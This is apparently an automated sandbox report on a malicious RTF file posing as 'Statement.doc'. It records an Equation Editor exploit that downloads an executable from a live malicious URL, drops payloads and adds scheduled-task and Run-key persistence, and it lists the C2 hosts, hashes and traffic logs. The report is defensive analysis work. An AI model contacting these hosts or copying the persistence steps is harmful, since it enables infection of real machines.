http://www.%s.comPA	0%	URL Reputation	safe
http://manojvashanava234.sytes.net/WAH.exe	10%	Virustotal		Browse
http://manojvashanava234.sytes.net/WAH.exe	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
dmjncbzvayuywqalponmcbvzcxhyuesgfhdnautwm.ydns.eu	46.243.219.32	true	true		unknown
manojvashanava234.sytes.net	84.38.135.158	true	true	11%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://manojvashanava234.sytes.net/WAH.exe	true	10%, Virustotal, Browse Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.%s.comPA	JNM.exe, 00000003.00000002.2364935179.0000000006420000.00000002.00000001.sdmp, JNM.exe, 00000007.00000002.2361274784.0000000005760000.00000002.00000001.sdmp, taskeng.exe, 0000000D.00000002.2356083438.0000000001BE0000.00000002.00000001.sdmp, JNM.exe, 0000000F.00000002.2363821875.00000000064C0000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	low
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.	JNM.exe, 00000003.00000002.2364935179.0000000006420000.00000002.00000001.sdmp, JNM.exe, 00000007.00000002.2361274784.0000000005760000.00000002.00000001.sdmp, taskeng.exe, 0000000D.00000002.2356083438.0000000001BE0000.00000002.00000001.sdmp, JNM.exe, 0000000F.00000002.2363821875.00000000064C0000.00000002.00000001.sdmp	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
84.38.135.158	unknown	Latvia		52048	DATACLUBLV	true
46.243.219.32	unknown	Netherlands		43317	FISHNET-ASRU	true

General Information

Joe Sandbox Version:	31.0.0 Emerald
Analysis ID:	345151
Start date:	27.01.2021
Start time:	19:11:33
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 12m 12s
Hypervisor based Inspection enabled:	false
Report type:	light
Sample file name:	Statement.doc
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:	28
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.expl.evad.winDOC@32/13@16/2
EGA Information:	Failed
HDC Information:	Failed
HCA Information:	Successful, ratio: 94% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .doc Found Word or Excel or PowerPoint or XPS Viewer Attach to Office via COM Active ActiveX Object Scroll down Close Viewer
Warnings:	Show All Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, conhost.exe, svchost.exe TCP Packets have been reduced to 100 Report size exceeded maximum capacity and may have missing behavior information. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
19:12:40	API Interceptor	235x Sleep call for process: EQNEDT32.EXE modified
19:12:42	API Interceptor	1881x Sleep call for process: JNM.exe modified
19:12:49	Task Scheduler	Run new task: SMTP Service path: "C:\Users\user\AppData\Roaming\JNM.exe" s>$(Arg0)
19:12:49	API Interceptor	2x Sleep call for process: schtasks.exe modified
19:12:49	Autostart	Run: HKLM\Software\Microsoft\Windows\CurrentVersion\Run SMTP Service C:\Program Files (x86)\SMTP Service\smtpsvc.exe
19:12:50	API Interceptor	427x Sleep call for process: taskeng.exe modified
19:12:51	Task Scheduler	Run new task: SMTP Service Task path: "C:\Program Files (x86)\SMTP Service\smtpsvc.exe" s>$(Arg0)
19:12:52	API Interceptor	218x Sleep call for process: smtpsvc.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
84.38.135.158	Quote Requirement.doc	Get hash	malicious	Browse	manojvashanava234.sytes.net/OSE.exe
	New order.doc	Get hash	malicious	Browse	manojvashanava234.sytes.net/CIC.exe
	Quote Requirement.doc	Get hash	malicious	Browse	manojvashanava234.sytes.net/OSE.exe
	PMTI000021.doc	Get hash	malicious	Browse	manojvashanava234.sytes.net/OSE.exe

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
manojvashanava234.sytes.net	Quote Requirement.doc	Get hash	malicious	Browse	84.38.135.158
	New order.doc	Get hash	malicious	Browse	84.38.135.158
	Quote Requirement.doc	Get hash	malicious	Browse	84.38.135.158
	PMTI000021.doc	Get hash	malicious	Browse	84.38.135.158

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
DATACLUBLV	Quote Requirement.doc	Get hash	malicious	Browse	84.38.135.158
	New order.doc	Get hash	malicious	Browse	84.38.135.158
	Quote Requirement.doc	Get hash	malicious	Browse	84.38.135.158
	PMTI000021.doc	Get hash	malicious	Browse	84.38.135.158
	PO 10834.exe	Get hash	malicious	Browse	46.183.220.113
	https://gfifaxmakeronline.cmail19.com/t/t-l-xhjmc-glrjkydlk-r/	Get hash	malicious	Browse	109.248.150.119
	qWuT75h3FNx6Mbp.exe	Get hash	malicious	Browse	46.183.218.199
	New Sales.exe	Get hash	malicious	Browse	84.38.134.123
	Kabg6OuIx3R.exe	Get hash	malicious	Browse	84.38.134.114
	http://46.183.222.25/LVS7Kabg6OuIx3R.exe	Get hash	malicious	Browse	46.183.222.25
	DIL-Statement Overdues & Listed Invoice-August 2020.exe	Get hash	malicious	Browse	84.38.135.151
	Scan_17-08-2020 AFSLC INV#0002932.exe	Get hash	malicious	Browse	84.38.135.151
	New_ Order0608202023838494575859445.exe	Get hash	malicious	Browse	84.38.130.164
	ORDER.exe	Get hash	malicious	Browse	84.38.130.164
	Scan_Docs #INV 300489739-04-08-2020 Amended.exe	Get hash	malicious	Browse	84.38.135.151
	o3vcAB1r3E.exe	Get hash	malicious	Browse	46.183.222.16
	Scan_SOA Updated June 2020--06-29-reconciled_.exe	Get hash	malicious	Browse	84.38.135.151
	1.12.2018.js	Get hash	malicious	Browse	46.183.218.82
	invoice-00976.pdf	Get hash	malicious	Browse	46.183.222.166
	46MON.exe	Get hash	malicious	Browse	46.183.220.71

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Program Files (x86)\SMTP Service\smtpsvc.exe Download File
Process:	C:\Users\user\AppData\Roaming\JNM.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1973760
Entropy (8bit):	2.849298578285801
Encrypted:	false
SSDEEP:	1536:FNn93XOcZPdE8u+6zQc/jLsAngk98QjHBxo:z93ecZC8u+68c/7986
MD5:	10D30AD1922421E73E133AD020DF424F
SHA1:	7AB820DC29537EBAADB2D04C2F8B6F246CB8F24A
SHA-256:	79D73D305E1A52C157868E9F0305AE5E6AEBB28E43D360334C118FC1640A5B2C
SHA-512:	72E98B506476EE511D54D0F676FE559C603DD688D5C56B43A124D2D1A712561CD97236CACFE9DC064E416537CA717C2D207F0B4A123CCFA1E966372D8F642A8A
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 35%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....9.`............................^8... ...@....@.. .......................`............@..................................8..K............................@....................................................... ............... ..H............text...d.... ...................... ..`.reloc.......@......................@..B........................................................@8......H........R..`............................................................. .........90...(....9........r`..p....(C...(D...........(E.......*....(_.....0.._.......(....(....(....(....(....(....(....(....(....(....(...............(....(....(...............(....(....(...............(....(....(....(....(~...(}...(\|...({...(z...(y...(x...(w...(v...(u...(t...(s...(r...(q...(p...(o...(n..............(m...(l...(k..............(j...(i...(h..............(g...(f...(e..............

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\68A17DB9.wmf Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	Targa image data - Map - RLE 65536 x 65536 x 0 "\005"
Category:	dropped
Size (bytes):	180
Entropy (8bit):	2.943359370448092
Encrypted:	false
SSDEEP:	3:2lZlyll6/lollvlgiolog/lLneVOoEXaQNGbV91/l/eXavt/2mcll/l:2lb2oto90ogtqAozQNGbVPQXC1BUl/l
MD5:	3333D3D30CCB3D52656081D7983431F0
SHA1:	5AD6B35F57CEBB82EDC05BEA33C48D9B182B72CE
SHA-256:	58E99AEC6AA8488A9B78EE75D93B1FA64B686DE0006E179DEB084FF862CCBCAB
SHA-512:	6C8F2CF6460E61542D2A8E47A79BA194D5DC847E8E89C7CC143720C11CAB2BCB6E9A132C14A999CD1BA2587CF31ED0C76997564A64F47AA355698D408EE98F90
Malicious:	false
Preview:	.......................................................................... . .....&...................................&.....MathType..P.....&...........................Q...........

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{08186652-BACB-4000-A55F-0BCBA7498F21}.tmp Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	1024
Entropy (8bit):	0.8712130487472628
Encrypted:	false
SSDEEP:	6:44pwwNgREqAWlgFJpDlll8vlwpbRFwQFrB:vpdk5uFJp7uvqptKQZB
MD5:	F587AA2B21B6793637195CA6AD3AFF62
SHA1:	B28141557E577082F740B9F6EE9E4D1AD51741B3
SHA-256:	B93ABC1DEB43D1FBD06F94A37B28BF2CC4F3AD7A666A9F46BF09304E440107A1
SHA-512:	CF2CC9197CD6518C8498118597BC3400A04E00CD03702E799D01E829039603B7EF077B6AA40D2F6A3FD5FC4240D2B7ED3C7E4B9E77FB1CCF1EE8C535954831DE
Malicious:	false
Preview:	a.n.s.i.6.4.5.=......... .E.q.u.a.t.i.o.n...3.E.M.B.E.D.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................j....CJ..OJ..QJ..U..^J..aJ.. .j.9.c...CJ..OJ..QJ..U..^J..aJ.

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{55454834-8E09-401E-A760-1A1C7B299BE3}.tmp Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	1024
Entropy (8bit):	0.05390218305374581
Encrypted:	false
SSDEEP:	3:ol3lYdn:4Wn
MD5:	5D4D94EE7E06BBB0AF9584119797B23A
SHA1:	DBB111419C704F116EFA8E72471DD83E86E49677
SHA-256:	4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
SHA-512:	95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp5A32.tmp Download File
Process:	C:\Users\user\AppData\Roaming\JNM.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1310
Entropy (8bit):	5.1063907901076036
Encrypted:	false
SSDEEP:	24:2dH4+S/4oL600QlMhEMjn5pwjVLUYODOLG9RJh7h8gK0Rl4xtn:cbk4oL600QydbQxIYODOLedq3Sl4j
MD5:	CFAE5A3B7D8AA9653FE2512578A0D23A
SHA1:	A91A2F8DAEF114F89038925ADA6784646A0A5B12
SHA-256:	2AB741415F193A2A9134EAC48A2310899D18EFB5E61C3E81C35140A7EFEA30FA
SHA-512:	9DFD7ECA6924AE2785CE826A447B6CE6D043C552FBD3B8A804CE6722B07A74900E703DC56CD4443CAE9AB9601F21A6068E29771E48497A9AE434096A11814E84
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo />.. <Triggers />.. <Principals>.. <Principal id="Author">.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>HighestAvailable</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>.. <AllowHardTerminate>true</AllowHardTerminate>.. <StartWhenAvailable>false</StartWhenAvailable>.. <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>.. <IdleSettings>.. <StopOnIdleEnd>false</StopOnIdleEnd>.. <RestartOnIdle>false</RestartOnIdle>.. </IdleSettings>.. <AllowStartOnDemand>true</AllowStartOnDemand>.. <Enabled>true</Enabled>.. <Hidden>false</Hidden>.. <RunOnlyIfIdle>false</RunOnlyIfIdle>.. <Wak

C:\Users\user\AppData\Local\Temp\tmp6D54.tmp Download File
Process:	C:\Users\user\AppData\Roaming\JNM.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1301
Entropy (8bit):	5.105807939032916
Encrypted:	false
SSDEEP:	24:2dH4+S/4oL600QlMhEMjn5pwjVLUYODOLG9RJh7h8gK01xtn:cbk4oL600QydbQxIYODOLedq3Mj
MD5:	E2E1F2413B11C7C1D1A56333B80F7094
SHA1:	34C94BE675B0741BFC81E19599597F6C54C3DF2B
SHA-256:	EE1E3555090011DA7680ED21F6428CDC078D5808C1E702C9375F3771C247093A
SHA-512:	473462E626DEAF58E8A94D27A0B78634F6358CE842F6946A5C34831CCB976BB2681643C674F4413AC86F4A57B5B988750AFEB0C8D5620BCBDB938A769565840D
Malicious:	true
Preview:	<?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo />.. <Triggers />.. <Principals>.. <Principal id="Author">.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>HighestAvailable</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>.. <AllowHardTerminate>true</AllowHardTerminate>.. <StartWhenAvailable>false</StartWhenAvailable>.. <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>.. <IdleSettings>.. <StopOnIdleEnd>false</StopOnIdleEnd>.. <RestartOnIdle>false</RestartOnIdle>.. </IdleSettings>.. <AllowStartOnDemand>true</AllowStartOnDemand>.. <Enabled>true</Enabled>.. <Hidden>false</Hidden>.. <RunOnlyIfIdle>false</RunOnlyIfIdle>.. <Wak

C:\Users\user\AppData\Roaming\EA860E7A-A87F-4A88-92EF-38F744458171\run.dat Download File
Process:	C:\Users\user\AppData\Roaming\JNM.exe
File Type:	Non-ISO extended-ASCII text, with no line terminators
Category:	dropped
Size (bytes):	8
Entropy (8bit):	3.0
Encrypted:	false
SSDEEP:	3:m9tn:m9t
MD5:	0039F8C444DA3D4473B68D9BCBE67956
SHA1:	DFADD58D8BCC00441089D7E50B6680F6ADE59708
SHA-256:	E4E991B189A88F18F21C4BBF6E70AC805CAE23C195822E68124F7E412945E635
SHA-512:	D81B1BC62638CE8029BB589A4AA977A598DAA2D6CE014AF10EF58D85076BE63D4E5F094EE4B1E473DBBB3E1C9EF8861FD90BC1877884715026BF37BC1B6CFB82
Malicious:	true
Preview:	.8.:..H

C:\Users\user\AppData\Roaming\EA860E7A-A87F-4A88-92EF-38F744458171\task.dat Download File
Process:	C:\Users\user\AppData\Roaming\JNM.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	38
Entropy (8bit):	4.461761645524449
Encrypted:	false
SSDEEP:	3:oNXp4EaKC5z9A:oNPaZ5W
MD5:	8631085785FF73C31973E2E860CF2323
SHA1:	90270C28AA4C410258DD47311574F316DBCC846C
SHA-256:	3F07927E5440E7853B9BE8E6EC4A8183AE09D75FBFF58817750058224B888FD9
SHA-512:	B60AA085CE40A555CF7A3F4FDF37AB3AB916480010499478EE1BD79EC5978E1057FC09A44D92E8BA2B4D660011D0554B3485B66C90536C738AFE2A278ED511DB
Malicious:	false
Preview:	C:\Users\user\AppData\Roaming\JNM.exe

C:\Users\user\AppData\Roaming\JNM.exe Download File
Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1973760
Entropy (8bit):	2.849298578285801
Encrypted:	false
SSDEEP:	1536:FNn93XOcZPdE8u+6zQc/jLsAngk98QjHBxo:z93ecZC8u+68c/7986
MD5:	10D30AD1922421E73E133AD020DF424F
SHA1:	7AB820DC29537EBAADB2D04C2F8B6F246CB8F24A
SHA-256:	79D73D305E1A52C157868E9F0305AE5E6AEBB28E43D360334C118FC1640A5B2C
SHA-512:	72E98B506476EE511D54D0F676FE559C603DD688D5C56B43A124D2D1A712561CD97236CACFE9DC064E416537CA717C2D207F0B4A123CCFA1E966372D8F642A8A
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 35%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....9.`............................^8... ...@....@.. .......................`............@..................................8..K............................@....................................................... ............... ..H............text...d.... ...................... ..`.reloc.......@......................@..B........................................................@8......H........R..`............................................................. .........90...(....9........r`..p....(C...(D...........(E.......*....(_.....0.._.......(....(....(....(....(....(....(....(....(....(....(...............(....(....(...............(....(....(...............(....(....(....(....(~...(}...(\|...({...(z...(y...(x...(w...(v...(u...(t...(s...(r...(q...(p...(o...(n..............(m...(l...(k..............(j...(i...(h..............(g...(f...(e..............

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Statement.LNK Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:15 2020, mtime=Wed Aug 26 14:08:15 2020, atime=Thu Jan 28 02:12:38 2021, length=111234, window=hide
Category:	dropped
Size (bytes):	2018
Entropy (8bit):	4.566530606487488
Encrypted:	false
SSDEEP:	48:8x/XT0jFg2KrRf4fQh2x/XT0jFg2KrRf4fQ/:8x/XojFdKlgfQh2x/XojFdKlgfQ/
MD5:	9740F08F03EE9772C514D416300985C8
SHA1:	653862A7796EF8FFFAB1254457FB760B794A131A
SHA-256:	D6A4332A51D8E1FEC91F2C5EEBE478FDC48ACDDB4E0B12E93112AFD691A2949B
SHA-512:	237EBAD846AC6262709CDFBB6D0B3DE59E2B7495A97D2A93EB2076F2C6C817C34A26650E46A4505BFABF785556879F08F780D1FCB7216A784A9DD0AF7A55EF3E
Malicious:	false
Preview:	L..................F.... ...y.j..{..y.j..{.....n#................................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....d.2.....<R.. .STATEM~1.DOC..H.......Q.y.Q.y...8.....................S.t.a.t.e.m.e.n.t...d.o.c.......w...............-...8...[............?J......C:\Users\..#...................\\305090\Users.user\Desktop\Statement.doc.$.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.S.t.a.t.e.m.e.n.t...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......305090..........D_....3N...W...9F.C...........[D_....3N...W...9F.C.......

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	65
Entropy (8bit):	4.102256182446669
Encrypted:	false
SSDEEP:	3:M12EmpRYuTpRYmX12EmpRYv:MANpRZpReNpRC
MD5:	A225ECA3DB57FCE1A5758E3D1A8724AD
SHA1:	D6EE62F233AC11C74ECEF20EF8C3205C1CFB08C3
SHA-256:	5BDBB39ABB1F4FA53F48A82EA99E73329B590A8D5A4647D1A6CF93FF22E84541
SHA-512:	F4379DDE6A7A408FC07B534C97A0BA3786FBFB9C81E18BC8512FDC060A79EB6E28A239C68C83100497BFC620E3A3B9DA092BADB96C220C771BD496EF55FAF00E
Malicious:	false
Preview:	[doc]..Statement.LNK=0..Statement.LNK=0..[doc]..Statement.LNK=0..

C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	162
Entropy (8bit):	2.431160061181642
Encrypted:	false
SSDEEP:	3:vrJlaCkWtVy3KGcils6w7Adtln:vdsCkWthGciWfQl
MD5:	4A5DFFE330E8BBBF59615CB0C71B87BE
SHA1:	7B896C17F93ECFC9B69E84FC1EADEDD9DA550C4B
SHA-256:	D28616DC54FDEF1FF5C5BA05A77F178B7E3304493BAF3F4407409F2C84F4F215
SHA-512:	3AA160CB89F4D8393BCBF9FF4357FFE7AE00663F21F436D341FA4F5AD4AEDC737092985EB4A94A694A02780597C6375D1615908906A6CEC6D7AB616791B6285C
Malicious:	false
Preview:	.user..................................................A.l.b.u.s.............p.......................................P.....................z...............x...

C:\Users\user\Desktop\~$atement.doc Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	162
Entropy (8bit):	2.431160061181642
Encrypted:	false
SSDEEP:	3:vrJlaCkWtVy3KGcils6w7Adtln:vdsCkWthGciWfQl
MD5:	4A5DFFE330E8BBBF59615CB0C71B87BE
SHA1:	7B896C17F93ECFC9B69E84FC1EADEDD9DA550C4B
SHA-256:	D28616DC54FDEF1FF5C5BA05A77F178B7E3304493BAF3F4407409F2C84F4F215
SHA-512:	3AA160CB89F4D8393BCBF9FF4357FFE7AE00663F21F436D341FA4F5AD4AEDC737092985EB4A94A694A02780597C6375D1615908906A6CEC6D7AB616791B6285C
Malicious:	false
Preview:	.user..................................................A.l.b.u.s.............p.......................................P.....................z...............x...

Static File Info

General
File type:	Rich Text Format data, unknown version
Entropy (8bit):	4.012906709970664
TrID:	Rich Text Format (5005/1) 55.56% Rich Text Format (4004/1) 44.44%
File name:	Statement.doc
File size:	111234
MD5:	854716b6ff05f02534960443c94340a1
SHA1:	6955e99f687a65747a95745b721c43543f3cf389
SHA256:	1421f7c867ff97c915fab1236fe5277b3116b426c0102f805fab25ef19fc681c
SHA512:	c05f6e67531bbefc6dd30bc13b3bee940ea63d1050d6ab26b8b2e8059e10f1714f1a2c2d4700d85ca863cfcd2b0b9665fc08121c9aada7ebb390bdf70bd5e89e
SSDEEP:	3072:/PQuOh2WX/aNt8lHvasJjjg6jYHh8Oj+JiII/:/PQ1dSNaUsJjpjYHwJq/
File Content Preview:	{\rtf2760{\object19672773\objhtml\objw7805\objh3271{\\objdata753025{\\qmspace645ansi645\\pwd645 \\qmspace645ansi645\\.645} \...c6d4656e020000000b00000065{\\objupdate}71554154494f4e2e3300000

File Icon


Icon Hash:	e4eea2aaa4b4b4a4

Static RTF Info

Objects

Id	Start	Format ID	Format	Classname	Datasize	Filename	Sourcepath	Temppath	Exploit
0	00000040h								no

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 27, 2021 19:12:26.374280930 CET	49165	80	192.168.2.22	84.38.135.158
Jan 27, 2021 19:12:26.450932980 CET	80	49165	84.38.135.158	192.168.2.22
Jan 27, 2021 19:12:26.451047897 CET	49165	80	192.168.2.22	84.38.135.158
Jan 27, 2021 19:12:26.451312065 CET	49165	80	192.168.2.22	84.38.135.158
Jan 27, 2021 19:12:26.534096956 CET	80	49165	84.38.135.158	192.168.2.22
Jan 27, 2021 19:12:26.534126043 CET	80	49165	84.38.135.158	192.168.2.22
Jan 27, 2021 19:12:26.534138918 CET	80	49165	84.38.135.158	192.168.2.22
Jan 27, 2021 19:12:26.534154892 CET	80	49165	84.38.135.158	192.168.2.22
Jan 27, 2021 19:12:26.534333944 CET	49165	80	192.168.2.22	84.38.135.158
Jan 27, 2021 19:12:26.611943007 CET	80	49165	84.38.135.158	192.168.2.22
Jan 27, 2021 19:12:26.611969948 CET	80	49165	84.38.135.158	192.168.2.22
Jan 27, 2021 19:12:26.611987114 CET	80	49165	84.38.135.158	192.168.2.22
Jan 27, 2021 19:12:26.612005949 CET	80	49165	84.38.135.158	192.168.2.22
Jan 27, 2021 19:12:26.612018108 CET	80	49165	84.38.135.158	192.168.2.22
Jan 27, 2021 19:12:26.612051010 CET	80	49165	84.38.135.158	192.168.2.22
Jan 27, 2021 19:12:26.612117052 CET	80	49165	84.38.135.158	192.168.2.22
Jan 27, 2021 19:12:26.612133980 CET	80	49165	84.38.135.158	192.168.2.22
Jan 27, 2021 19:12:26.612291098 CET	49165	80	192.168.2.22	84.38.135.158
Jan 27, 2021 19:12:26.612301111 CET	49165	80	192.168.2.22	84.38.135.158
Jan 27, 2021 19:12:26.689646959 CET	80	49165	84.38.135.158	192.168.2.22
Jan 27, 2021 19:12:26.689673901 CET	80	49165	84.38.135.158	192.168.2.22
Jan 27, 2021 19:12:26.689686060 CET	80	49165	84.38.135.158	192.168.2.22
Jan 27, 2021 19:12:26.689732075 CET	80	49165	84.38.135.158	192.168.2.22
Jan 27, 2021 19:12:26.689796925 CET	80	49165	84.38.135.158	192.168.2.22
Jan 27, 2021 19:12:26.689814091 CET	80	49165	84.38.135.158	192.168.2.22
Jan 27, 2021 19:12:26.689831018 CET	80	49165	84.38.135.158	192.168.2.22
Jan 27, 2021 19:12:26.689848900 CET	80	49165	84.38.135.158	192.168.2.22
Jan 27, 2021 19:12:26.689866066 CET	80	49165	84.38.135.158	192.168.2.22
Jan 27, 2021 19:12:26.689882040 CET	80	49165	84.38.135.158	192.168.2.22
Jan 27, 2021 19:12:26.689953089 CET	49165	80	192.168.2.22	84.38.135.158
Jan 27, 2021 19:12:26.689966917 CET	80	49165	84.38.135.158	192.168.2.22
Jan 27, 2021 19:12:26.689982891 CET	80	49165	84.38.135.158	192.168.2.22
Jan 27, 2021 19:12:26.689996004 CET	49165	80	192.168.2.22	84.38.135.158
Jan 27, 2021 19:12:26.690001011 CET	80	49165	84.38.135.158	192.168.2.22
Jan 27, 2021 19:12:26.690021038 CET	80	49165	84.38.135.158	192.168.2.22
Jan 27, 2021 19:12:26.690095901 CET	49165	80	192.168.2.22	84.38.135.158
Jan 27, 2021 19:12:26.691543102 CET	49165	80	192.168.2.22	84.38.135.158
Jan 27, 2021 19:12:26.768106937 CET	80	49165	84.38.135.158	192.168.2.22
Jan 27, 2021 19:12:26.768136024 CET	80	49165	84.38.135.158	192.168.2.22
Jan 27, 2021 19:12:26.768147945 CET	80	49165	84.38.135.158	192.168.2.22
Jan 27, 2021 19:12:26.768160105 CET	80	49165	84.38.135.158	192.168.2.22
Jan 27, 2021 19:12:26.768177986 CET	80	49165	84.38.135.158	192.168.2.22
Jan 27, 2021 19:12:26.768193960 CET	80	49165	84.38.135.158	192.168.2.22
Jan 27, 2021 19:12:26.768209934 CET	80	49165	84.38.135.158	192.168.2.22
Jan 27, 2021 19:12:26.768224955 CET	80	49165	84.38.135.158	192.168.2.22
Jan 27, 2021 19:12:26.768282890 CET	80	49165	84.38.135.158	192.168.2.22
Jan 27, 2021 19:12:26.768300056 CET	80	49165	84.38.135.158	192.168.2.22
Jan 27, 2021 19:12:26.768311977 CET	80	49165	84.38.135.158	192.168.2.22
Jan 27, 2021 19:12:26.768323898 CET	80	49165	84.38.135.158	192.168.2.22
Jan 27, 2021 19:12:26.768347025 CET	49165	80	192.168.2.22	84.38.135.158
Jan 27, 2021 19:12:26.768369913 CET	80	49165	84.38.135.158	192.168.2.22
Jan 27, 2021 19:12:26.768414974 CET	80	49165	84.38.135.158	192.168.2.22
Jan 27, 2021 19:12:26.768435955 CET	49165	80	192.168.2.22	84.38.135.158
Jan 27, 2021 19:12:26.768440008 CET	49165	80	192.168.2.22	84.38.135.158
Jan 27, 2021 19:12:26.768455982 CET	80	49165	84.38.135.158	192.168.2.22
Jan 27, 2021 19:12:26.768474102 CET	80	49165	84.38.135.158	192.168.2.22
Jan 27, 2021 19:12:26.768491030 CET	80	49165	84.38.135.158	192.168.2.22
Jan 27, 2021 19:12:26.768503904 CET	80	49165	84.38.135.158	192.168.2.22
Jan 27, 2021 19:12:26.768518925 CET	80	49165	84.38.135.158	192.168.2.22
Jan 27, 2021 19:12:26.768521070 CET	49165	80	192.168.2.22	84.38.135.158
Jan 27, 2021 19:12:26.768529892 CET	49165	80	192.168.2.22	84.38.135.158
Jan 27, 2021 19:12:26.768549919 CET	49165	80	192.168.2.22	84.38.135.158
